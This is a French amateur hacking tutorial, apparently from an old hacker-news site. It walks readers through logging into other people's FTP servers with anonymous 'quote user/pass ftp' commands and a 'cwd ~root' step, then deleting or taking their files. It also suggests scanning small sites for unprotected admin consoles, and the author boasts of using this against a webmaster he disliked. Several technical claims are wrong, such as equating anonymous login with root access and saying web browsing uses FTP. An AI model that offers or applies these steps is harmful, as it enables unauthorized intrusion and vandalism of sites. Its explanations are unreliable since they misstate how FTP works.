::Hacker Serveur Ftp::
Cet
article ainsi que 60 autres est aussi disponible sur
www.projectnews.org . Il
y a déjà 3 fois plus d'article que sur hackernews, une meilleur interface et
beaucoup de surprise. De plus une équipe est maintenant là pour vous répondre.
Hackernews est encore là pour une histoire de référencement. N'hésitez pas,
clique ici et rentrer
sur le leader mondiale de l'informatique francophonne et martien ;-)
www.projectnews.org
Je
vais vous présenter une technique assez simple mails qui malheuresement ne
fonctionne plus beaucoup aujourd'hui. Cependant, elle peut encore marcher.
Mais d'abord, qu'est-ce que le FTP? C'est un protocole de tranfert de fichier
d'un PC a un autre qui utilise les ports n°20 et 21. En clair, quand vous surfez
sur un site ou que vous télécharger des logiciels vous utilisez le protocole
FTP. Moi même pour transférer hackernews, j'utilise le protocole FTP. Au faite,
pour les petits malins qui ne veulent pas payer de logiciel FTP pour tranférer
leur site, il faut savoir que windows intègre un système de transfert de
fichier. Pour le lancer, c'est pas compliqué, faites démarer exécuter, taper
ftp-n (sans espace) et une fenêtre va se lancer. Cliquer sur fichier, se
connecter en temps que, entrer vos identifiants et le tour est joué. Je sais,
vous en avait rien a battre de ce que je dis et vous vous dites, moi ce que je
veux c'est hacker un site.Patience.
Aller, on commence!!!
1ère technique (hasardeuse et assez compliqué)
Commencer par faire
démarer, éxecuter et taper (en respectant bien les espaces)
ftp
-n
Une fenêtre dos va
s'ouvrir. On va commencer par exécuter une instruction tout simple pour nouer le
dialogue avec le serveur. Tapez
open
puis l'url du site soit
open
www.urldusiteahacker.com
Il se peut qu'après ça il y est
marqué un truc du genre "regarde dehors, les pulets t'attendent". Danc ce cas,
c'est même pas la peine, le serveur est surement sécurisé. Une fois que vous
êtes connecté, voici les instructions qu'il faudra entrer:
quote user ftp
quote cwd~root
quote pass ftp
Voici maintenant
ce que le serveur peut afficher :
Ce
qui est en rouge
c'est ce que l'on tape
Ce qui est en
bleu
c'est ce que le serveur répond
|
Serveur non
protégé |
Serveur
Protégé |
|
ftp>open www.url.com |
ftp>open www.url.com |
Connected to www.url.com
220 websrv1 Microsoft FTP Service (Version 6.0). |
Connected to www.url.com
websrv1 Microsoft FTP Service (Version 6.0). |
|
"le message varie selon le
système d'exploitation etc et selon le type de serveur." |
"le message varie selon le
système d'exploitation etc et selon le type de serveur." |
|
ftp>quote user ftp |
ftp>quote user ftp |
|
331 Anonymous acces allowed,
send identify (e-mail name) as password. |
331 Password required for ftp. |
|
ftp>quote cwd ~root |
ftp>quote cwd ~root |
|
530 Please login with USER and
PASS. |
530 Please login with USER and
PASS. |
|
ftp>quote pass ftp |
ftp>quote pass ftp |
|
230 Anonymous user
logged in. |
530 User ftp cannot log in. |
|
Là tu est connecté en tant que "Root"
si y a un pasword il faut le décrypter ! |
Quand c'est sécurisé t'es niké
laisse tombé cette méthode ! |
"mkdir"
: pour créer un répertoire
"rmdir"
: pour supprimer un répertoire .
"pwd"
: pour voir ou vous êtes sur le disque.
"cd"
: pour aller dans un répertoire
"dir"
: pour voir le contenu de la racine ou du répertoire où vous êtes.
" cd /"
: pour revenir à la racine. Ne pas oublier l'espace entre cd et /.
"cd .."
: pour revenir au répertoire précédent. Ne pas oublier l'espace entre cd et ..
"del"
: pour supprimer un fichier
"get"
: pour prendre un fichier et le mettre sur votre bureau
Toutes ses commandes doivent être suivi d'un nom :
Exemple del pigeon.html cette commande supprime la page du nom de "pigeon.html"
Attention il y a un espace entre "del" et "pigeon.html"
Pour quitter ftp, vous n'avez qu'à
taper "quit" ou "exit" selon votre version de DOS
Bonne amusement !
2ème technique (toute conne mais
aussi hasardeuse)
Pour un site qui utilise des
scripts, scanner le serveur avec intellitamper et double-cliquer sur des
fichiers de type admin.htm. Si c'est un petit site, le webmaster n'aura pas
forcément protéger sa console, et si c'est le cas, vous allez bien vous amusez.
(Je me suis servit de ctte technique il y a 2 mois pour calmer un webmaster qui
me faisait chier)